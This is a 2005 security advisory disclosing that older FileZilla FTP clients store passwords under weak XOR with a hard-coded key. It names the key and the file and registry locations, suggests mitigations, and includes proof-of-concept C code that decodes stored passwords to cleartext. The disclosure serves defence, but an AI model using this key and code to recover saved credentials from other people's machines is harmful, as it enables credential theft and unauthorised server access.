filezillaWeak.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Title: FileZilla weakly-encrypted password vulnerability  
Risk: HIGH  
Credits: pagvac (Adrian Pastor)  
Date found: 6th August, 2005  
Homepage: www.ikwt.com  
www.adrianpv.com  
E-mail: m123303[ - at - ]richmond.ac.uk  
  
  
Background  
- -----------  
FileZilla is the most active and most downloaded open source FTP/SFTP  
client (according to www.SourceForge.org at time of writing).  
Currently   
there is only a Windows version of this client.  
  
For some stats visit:  
http://sourceforge.net/top/mostactive.php?type=week  
http://sourceforge.net/top/toplist.php?type=downloads_week   
  
The project page can be found at:  
http://sourceforge.net/projects/filezilla/  
  
This advisory plus PoC code and executable can be found in the  
following links:  
  
http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip  
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zi  
p  
  
Versions affected  
- -----------------  
This vulnerability has been successfully tested on versions 2.2.14b   
and 2.2.15. However, it is suspected that most previous versions are   
also affected.  
  
  
Vulnerability summary  
- ---------------------  
- - FileZilla client stores password using weak XOR "encryption"  
- - The value of the cipher key is static (it never changes) and can   
be found in the source code  
  
  
Description of vulnerability  
- ----------------------------  
FileZilla saves configuration settings in two different locations:  
  
- - in an XML file   
- - in the Windows registry  
  
The method used to save configuration settings depends on the  
preferences used by the user during the installation of   
FileZilla. Either way, all configuration settings are stored in  
cleartext, EXCEPT for the password. However, the password   
is stored using very weak XOR "encryption" which can be easily  
reversed.   
  
There exists a problem in the way the XOR encryption is implemented  
because the same cipher key is always used. This key is   
hard-coded, which means that anyone can analyze the source code of  
the application and find it. Of course, this wouldn't be   
so easy if FileZilla wasn't an open source application.  
  
Once the key is known, an attacker can use it to decrypt the password  
back to its cleartext form. Because the XOR cryptographic algorithm  
used   
is symmetric, the same key is used for both, encrypting and  
decrypting.  
  
As mentioned before, the rest of the configuration settings are all  
in cleartext. Some information that would be useful for an   
attacker includes hostname of the server to connect to, default port,  
and username.   
  
If successfully exploited, this vulnerability will allow an attacker   
to access FTP (or SFTP) servers with the privileges of the user whose  
configuration settings were stolen from.  
  
In practice, this vulnerability could be exploited after a machine  
has been compromised, or by fooling the user into executing malicious  
code. Such code could dump the configuration settings, decrypt the  
password/s   
and sends them all to the attacker.   
  
It is common to see many popular trojans out there that exploit weak  
encryption vulnerabilities of this type. These trojans   
dump the credentials of popular applications such as Internet  
Explorer, VNC or even dialup connections. FileZilla could be   
the next added application in the list of all those trojans with  
password-dumping features.  
  
This vulnerability is somehow similar to the one found by Conde  
Vampiro in VNC 3 back in 1999. It's similar because in both   
cases we find an open source application using a fixed cipher key to  
decrypt passwords. Thus, making trivial to find the key.   
  
For more information on Conde Vampiro's findings visit  
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html  
  
  
Vulnerability details  
- ---------------------  
The XML configuration file is found at:  
  
%programfiles%\FileZilla\FileZilla.xml  
  
Where %programfiles% is the "program files" directory. This is  
usually "c:\program files" by default.  
  
The configuration settings are saved in the registry in:  
  
Hive: HKEY_CURRENT_USER  
Key: Software\FileZilla\Site Manager\[site_name]\  
  
Where [site_name] is the name given to the connection by the user.  
  
The password is saved in the previous key as a value with the  
following properties:  
Value: Pass  
Type: REG_SZ (string terminated in NULL)  
  
  
The cipher key can be found in Crypt.cpp and its value is:  
"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"  
  
  
Solution  
- --------  
Choose "Use secure mode" during the installation (this disables  
FileZilla from saving passwords), lockdown your client   
machines where the FileZilla client is installed, or update to a  
patched version which fixes this issue (if available).  
  
  
PoC Code  
- --------  
/*  
  
Filename: filezilla-pwdec.c  
Title: FileZilla Client - Weakly encrypted password exploit v0.01  
Author: pagvac (Adrian Pastor)  
Date: 8th August, 2005  
License: GPL  
email: m123303[-a-t-]richmond.ac.uk  
homepage: www.ikwt.com (In Knowledge We Trust)  
www.adrianpv.com  
  
Description: this tool asks the user for the "encrypted" password and  
computes the cleartext version of the password  
  
Other info: compile as a Win32 console application project in Visual  
C++  
  
Copyright (C) 2005 pagvac (Adrian Pastor)  
  
This program is free software; you can redistribute it and/or  
modify it under the terms of the GNU General Public License  
as published by the Free Software Foundation; either version 2  
of the License, or (at your option) any later version.  
  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public License  
along with this program; if not, write to the Free Software  
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA   
02110-1301, USA.  
  
*/  
  
  
//Includes  
#include <stdio.h>  
#include <string.h>  
#include <stdlib.h>  
#include <windows.h>  
  
//Macros  
#define MAX_SIZE 150  
#define SLEEP_TIME 5000  
  
//Global variable (cypher key)  
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";  
  
  
//PRE: decimal values representing ASCII chars,  
// every three digits becomes one ASCII char  
// e.g.: 042040063063  
//POST: ASCII chars are copied back to buff[]   
// e.g.: *(??  
// the length of the new string is returned  
int digit2char(char buff[])  
{  
char tmp_buff[4], ascii_buff[MAX_SIZE];  
unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);  
for(i=0,j=0;i<strlen(buff);i+=3,++j)   
{  
tmp_buff[0]=buff[i];  
tmp_buff[1]=buff[i+1];  
tmp_buff[2]=buff[i+2];  
tmp_buff[3]='\0';  
  
n=atoi(tmp_buff);  
ascii_buff[j]=(char)n;  
}  
ascii_buff[j]='\0';  
printf("ascii_buff:%s\n", ascii_buff);  
strcpy(buff, ascii_buff);  
  
return len;  
}  
  
//PRE: buffer containing ASCII chars of cypher   
// (rather than their numberic ASCII value)  
//POST:length of cleartext password is returned  
unsigned int decrypt(char buff[])  
{  
unsigned int i, pos, len;  
  
len=digit2char(buff);  
pos=len%strlen(m_key);  
  
for (i=0;i<len;i++)  
buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];  
  
return len;  
}  
  
int main(void)   
{  
char cypher[MAX_SIZE];  
unsigned int len=0,i=0;  
  
printf("Enter cypher (encrypted password)\ne.g.:  
120125125112000\n->");  
scanf("%s", cypher);  
if(strlen(cypher)%3==0)  
{  
len=decrypt(cypher);  
printf("cleartext password:");  
for(i=0;i<len;++i)  
printf("%c",cypher[i]);  
printf("\n");  
}  
else  
{  
printf("You didn't enter a valid cypher!\n");  
printf("It should be a numeric value whose length is multiple of  
3\n");  
}  
  
printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);  
Sleep(SLEEP_TIME);  
return 0;  
}  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQxho+LteQP8gtTAfEQI7JwCeNNjIc/wmQ8Dwbg6jjs0u/Iyh/GoAoJ24  
bq4jAqPwakzJk+rrAdpFaxr0  
=fWuP  
-----END PGP SIGNATURE-----  
`